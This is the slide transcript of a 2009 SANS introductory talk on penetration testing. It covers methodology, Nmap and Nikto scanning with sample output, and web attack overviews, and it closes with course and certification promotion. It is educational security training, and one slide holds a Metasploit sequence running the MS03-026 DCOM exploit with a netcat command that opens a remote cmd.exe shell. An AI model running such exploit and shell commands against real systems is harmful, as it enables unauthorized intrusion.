penetration testing basics
DESCRIPTION
A 45 minute presentation originally presented at the SANS COINS event in Regina, SK in March of 2009TRANSCRIPT
Penetration Testing Basics Rick Wanner 2009
Penetration Testing Basics
A presentation of The Internet Storm Center,
The SANS Institute andThe GIAC Certification
Program
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 2
About Me Rick Wanner B.Sc. I.S.P.
• Client Technology Manager, Security at SaskTel• Areas of expertise
– Secure Network Architecture, Penetration Testing– IDS, Policy Development and compliance
• Masters Student at STI (SANS Technology Institute)• Handler at the Internet Storm Center (isc.sans.org)• Independent contractor/Volunteer with SANS/GIAC• [email protected]
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 3
Presentation Overview
• Internet Storm Centre• SANS/GIAC Mini-Briefing• Security Mitigation Strategies
– Penetration Testing
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 4
The Internet Storm Center
• The Internet Storm Center acts as a distributed early warning system for the Internet
• The ISC acts as an intermediary with ISPs worldwide.
• The ISC is composed of approximately 40 volunteer handlers which coordinate a group of volunteer intrusion analysts and malware specialists.
• Daily blog/diary published at http://isc.sans.org/• Sponsored by the SANS Institute.
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 5
We want your logs!
• The ISCs principal inputs come from Dshield.org and Internet users
• All logs are scrubbed before they are submitted.
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 6
SANS Training andGIAC Certifications
• SANS Institute is the leading training organization for system administration, audit, network, security and security management.
• GIAC, The Global Information Assurance Certification program, provides assurance that a certified individual meets a minimum level of ability and possesses the skills necessary to do the job.
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 7
Today’s Cyber Threats
• Cyber threats have certainly changed since Al Gore invented the internet.
• What started off as an innocuous invention by ARPANET and supported by the U.S. Department of Defense, is now a significant vehicle for conducting business, shopping, banking, researching, communicating, and maintaining vital corporate information
• Unfortunately it’s also a haven for hackers and intrusive malicious code.
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 8
The Internet
•The Internet is a community of individuals with its good neighbourhoods and bad neighborhoods.
•In this community the bad neighborhoods are only separated from the good neighbourhoods by at most 150 milliseconds.
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 9
The Need for Information Security
• While you are working hard to protect your organization’s critical information and systems, there are others out there who want to compromise it.
• Learning the appropriate actions to secure this information not only benefits your employer, clients, and stockholders, it benefits you.
• In this industry, you don’t want to be the one who learned the hard way.
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 10
Security Outlook
• As users get more sophisticated, so do the bad guys.• A CA, Inc. report issued on January 29, 2007 stated that:• In 2006, trojans accounted for 62% of all malware; worms 24%; and
viruses and other types of malware accounted for the remaining 13%.
• CA, Inc predicts that attackers will use blended threats to steal private information and perpetrate other attacks– Phishers are getting smarter– Spam will increase– Targeted attacks will increase– A rise in the use of kernel rootkits– Increased exploitation of browser and application vulnerabilities– Typo-squatting on search engines will increase
– Attacks are increasingly sophisticated.
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 11
Penetration Testing
• Penetration testing is discovering vulnerabilities in your networks, systems, applications and data before the bad guys do.
• Penetration testing simulates the generalized attack methodology.
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 12
Generalized Attack Methodology
• Reconnaissance• Scanning• Gaining Access• Maintaining Access• Covering Tracks
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 13
Penetration Testing Method
• Preparation• Reconnaissance• Scanning• Exploitation• Analysis• Reporting
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 14
Preparation
• Define the parameters of the test.– Objectives– Scope– Roles and responsibilities– Limitations– Success factors– Timeline– Documented Permission
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 15
Reconnaissance
• Reconnaissance determines…”What can a potential attacker learn about your company?”
• Utilizes publicly available information.
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 16
Reconnaissance (2)
• Some sources of information:– Search Engines– Websites– Registrars– SEC– Recruiting sites– Netcraft.com
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 17
Reconnaissance (3) - Netcraft
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 18
Reconnaissance (4) - Netcraft
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 19
Scanning
• Now we know where to look, let’s dig in a little deeper.
• Generally you are going to use two types of scanners, port scanners, and vulnerability scanners.
• The hackers choice:– Nmap– Nessus
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 20
Nmap
• Nmap – open sourced port scanner
• Usually start with discovery scans and progress to targeted scans.
• Runs on Windows and *nix.• Available from nmap.org
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 21
Nmap Book
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 22
Nmap - Reconaissance
• nmap –sL <Address>• nmap –sL
www.telus.net/24• nmap –sL
205.206.163.16/24
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 23
Nmap - Discovery
• nmap –F <Address>• nmap –F
192.168.1.0/24
• nmap -top-ports 20 <address>
• nmap -top-ports 20 192.168.1.0/24
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 24
Nmap - Targeted
• nmap -F –A <address>• nmap -F –A 192.168.1.200
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 25
Vulnerability Scanner
• Nessus –open sourced VA scanner
• Vulnerability feed costs money.
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 26
Commercial Vulnerability Scanners
Rapid7 NeXpose
GFI LANguardeEye Retina Network
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 27
Application Attacks
• Now we have all these layers of protection. Are you still vulnerable?
• The fact is that you can’t deny what you must permit.
• What about application level attacks?
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 28
Cross-Site Scripting
• Allows code injection by malicious web users into the web pages viewed by other users.
• Root cause - lack of input filtering and validation
• Permits attacker to execute arbitrary scripts on the browser
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 29
Yahoo's HotJobs site vulnerable to cross-site scripting attack
Dan Kaplan - October 27 2008
Internet research firm Netcraft's toolbar has detected a cross site scripting bug in Yahoo that could be exploited to steal authentication cookies.
The flaw resides on Yahoo's HotJobs search engine site, on which hackers embedded malicious JavaScript code, Netcraft's Paul Mutton said in a blog post on Sunday.
"The script steals the authentication cookies that are sent for the Yahoo.com domain and passes them to a different website in the United States, where the attacker is harvesting stolen authentication details," Mutton wrote.
The pilfered credentials could enable the attackers access to the victims' Yahoo acounts, including email. This vulnerability is similar to another bug that affected Yahoo earlier this year, he said.
"Simply visiting the malign URLs on Yahoo.com can be enough for a victim to fall prey to the attacker, letting him steal the necessary session cookies to gain access to the victim's email — the victim does not even have to type in their username and password for the attacker to do this," Mutton wrote. "Both attacks send the victim to a blank webpage, leaving them unlikely to realize that their own account has just been compromised."
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 30
Cross-Site Request Forgery (XSRF)
• Unauthorized commands are transmitted from a user that the website trusts.
• Exploitation of an existing web session.
• Embedded code causes unauthorized actions
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 31
SQL Injection
• SQL statements are injected into user input to see if a response is returned.
• Results– Authentication Bypass– Unauthorized data access
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 32
Preventing Web Application Attacks
• Every input should be validated!• “Suspicion Breeds Confidence”
– Test it!
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 33
Nikto
• Open source Linux based web application scanner
• Available at http://www.cirt.net/nikto2
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 34
Nikto (2)
• Basic Scanperl nikto.pl –h <host>perl nikto.pl –h 192.168.1.1
• Multiple portsperl nikto.pl –h 192.168.1.1 –p
80,88,443
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 35
Nikto – Simple Scan
[root@rwanner nikto]# ./nikto.pl -h localhost- Nikto v2.03/2.04---------------------------------------------------------------------------+ Target IP: 127.0.0.1+ Target Hostname: localhost+ Target Port: 80+ Start Time: 2008-10-27 21:53:47---------------------------------------------------------------------------+ Server: Apache/2.2.6 (Fedora)- Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This
message does not mean it is vulnerable to XST.+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.2.9). Apache 1.3.39 and 2.0.61 are also current.+ OSVDB-682: GET /usage/ : Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.+ OSVDB-877: TRACE / : TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-
mirror/WhitePaper_screen.pdf for details+ OSVDB-3092: GET /manual/ : Web server manual found.+ OSVDB-3268: GET /icons/ : Directory indexing is enabled: /icons+ OSVDB-3268: GET /manual/images/ : Directory indexing is enabled: /manual/images+ OSVDB-3233: GET /icons/README : Apache default file found.+ 3577 items checked: 9 item(s) reported on remote host+ End Time: 2008-10-27 21:54:28 (41 seconds)
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 36
Nikto (3)
• Multiple hostsperl nikto.pl –h <filename>perl nikto.pl –h hosts.txt
• Hosts file192.168.1.1:80:443192.168.0.200192.168.0.200,443
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 37
Nikto – Multiple Hosts Scan
]# ./nikto.pl -h hosts.txt- Nikto v2.03/2.04---------------------------------------------------------------------------+ Target IP: 192.168.1.1+ Target Hostname: 192.168.1.1+ Target Port: 443---------------------------------------------------------------------------+ SSL Info: Ciphers: DES-CBC3-SHA Info: /C=US/ST=California/L=Irvine/O=Cisco-Linksys,
LLC/OU=Division/CN=Linksys/[email protected] Subject: /C=US/ST=California/L=Irvine/O=Cisco-Linksys,
LLC/OU=Division/CN=Linksys/[email protected]+ Start Time: 2008-10-28 21:16:37---------------------------------------------------------------------------+ Server: No banner retrieved
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 38
Commercial Web Scanners
IBM Rational AppScanHP Webinspect
Cenzic Hailstorm
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 39
Exploitation
• Once you identify a potential vulnerability you have choices:– Can use individual exploits…available via
the Internet– Can use pre-built exploitation frameworks.
• The most popular exploitation framework is Metasploit.– Available for Windows or Linux– Available at http://www.metasploit.com/
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 40
Metasploit
• 3 primary components– Exploit
• Stack/Heap based buffer overflow• Insecure coding• PHP vulnerability, IIS Unicode, SQL injection, etc.
– NOP sled (optional - exploit dependent)
– Payload• Shellcode• Encoders• Other (exploit dependent)
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 41
Metasploit
#./msfconsole start Metasploitmsf > use windows/dcerpc/ms03_026_dcommsf > setg PAYLOAD windows/execmsf > setg CMD nc –L –p 80 cmd.exemsf > setg RHOST 192.168.0.2msf > exploit
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 42
Exploitation Demo
• Patching and Configuration– Lacking patch management procedures– Single inbound port open through
firewall• Results
– Simple remote exploitation– Worm characteristics– Can be used to bypass firewalls
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 43
Commercial Tools
Core Impact
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 44
Analysis
• When you finish you will have a mountain of data to analyze.
• Break it down by a risk based approach.
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 45
Reporting
• Base your report on risk.• Write it so your senior executives
can understand.• Provide recommendation based on
standards or best practices.• Keep the Executive summary short.• Stay away from FUD!
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 46
Presentation Summary
• Support the Internet Storm Center (ISC)
• SANS is the best!• Test your servers and
applications... before the bad guys do!
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 47
Special Tuition Offer
Because you attended this session, we are offering you 10% discount on tuition for our upcoming Critical infrastructure course in Calgary
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 48
COMMUNITY SANS
For details on this special offer, please
contact [email protected]
for further information.
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 49
Community SANS in Calgary
Critical Infrastructure Protection in CALGARY
Monday, June 15, 2009 – Wednesday, June 17, 2009
Please use:
Discount Code: COINS10 Discount : 10%
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 50
COMMUNITY SANS in REGINA
We are coming back to Regina again next month!!!
April 6-8, 2009Regina Inn –
Hotel & Conference Centre
Security 557 -“Virtualization Security and
Operations”
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 51
One CPE Credit
You will receive one CPE credit for attending this
evening.
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 52
THANK YOU!!!!
This evening was brought to on behalf of our COMMUNITY OF INTEREST IN NETWORK SECURITY (COINS) program.
Thank you for joining us tonight!
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 53
SANS/GIAC Overview
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 54
SANS Training andGIAC Certifications
• SANS Institute is the leading training organization for system, audit, network, and security.
• GIAC, The Global Information Assurance Certification program, provides assurance that a certified individual meets a minimum level of ability and possesses the skills necessary to do the job.
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 55
SANS and GIACGuiding Principles
• Education– Current, Evolving and Proven Material– Certifications that prove you have the
knowledge and skills to get the job done• Hands-On
– Hands-on training conducted by instructors who are experts in their fields
– Testing process that evaluates hands-on capabilities
• Community– Listening and learning to the community’s
needs– Giving vital knowledge back to the
community
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 56
How SANS and GIAC Are Different From Other Training/Certifications
• SANS and GIAC constantly update course and certification information to keep you on top of current threats and vulnerabilities.
• We use real-world, hands-on scenarios.• While tools are an important part of IT
security, we teach you and validate actual skills, so you don’t have to solely rely on the performance of a tool.
• The SANS Promise - You will be able to apply our information security training the day you get back to the office.
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 57
57
GIAC Certification
GIAC Silver Certifications – Multiple choice exams only
GIAC Gold Certifications – Plus a written technical report
GIAC Platinum Series – Highest certification level
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 58
Top 3 Reasons to Earn Your GIAC Certification
1.Hiring managers use GIAC certifications to ensure that candidates actually possess deep technical skills
2.GIAC certifications help IT Security Professionals get promoted faster and earn more money
3.GIAC certification reinforces and affirms the 'hands on' knowledge you possess
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 59
What Certified People Say?
"The GIAC certification has enabled me to take the next step in my Information Security career. It allowed me to prove that my value was more than just that of a security minded Sys Admin."–J. Klein, Enterprise Information Systems, Cedars-Sinai Medical Center
"The SANS hands-on experience and the intensive GIAC certification process has garnered me the respect of my boss and peers. Now, when I speak, people listen. I have the confidence to get the job done. My boss looks at me with respect that simply wasn't there before SANS training and GIAC certification. Not only my boss, but managers and peers at other large organizations.“ Matt Carpenter, Enterprise Information Systems
GIAC certifications help IT Security Professionals get promoted faster and earn more money…
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 60
GIAC Certifications
• GSEC - Security Essentials
• GCFW - Firewall Analyst• GCIA - Intrusion Analyst• GCIH - Incident Handler• GCFA - Forensics Analyst• GCUX - Unix Security• GCWN - Windows
Security• GNET - . NET• GSOC - Securing Oracle• GSSP-JAVA - Secure
Coding• GSSP-C - Secure Coding
• GISF - Information Security Fundamentals
• GSAE - Security Audit Essentials• GSLC - Security Leadership• GSNA - System & Network Auditor• G7799 - ISO 17799/27001• GISP - Information Security
Professional• GCIM - Incident Manager• GAWN - Auditing Wireless Networks• GREM - Reverse-Engineering
Malware• GPEN - Penetration Tester• GCPM - IT Project Management
For a complete list of GIAC Certificationshttp://www.giac.org/certifications/roadmap.php
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 61
Free Resources
• SANS and GIAC have a variety of free resources readily available at www.sans.org and www.giac.org
• Here’s a sample of what we offer:• Internet Storm Center• SANS reading room - http://www.sans.org/reading_room• Top 15 Malicious Spyware Actions• SANS Security Policy Samples • The Internet Guide to Popular Resources on Information Security• FAQ’s• SCORE• Security Tool White Papers and GIAC Gold Papers• Glossary of Security Terms
Program Overview - GIAC Certification © 2006Penetration Testing Basics Rick Wanner 2009 62
Questions: [email protected]@giac.org
Thank You!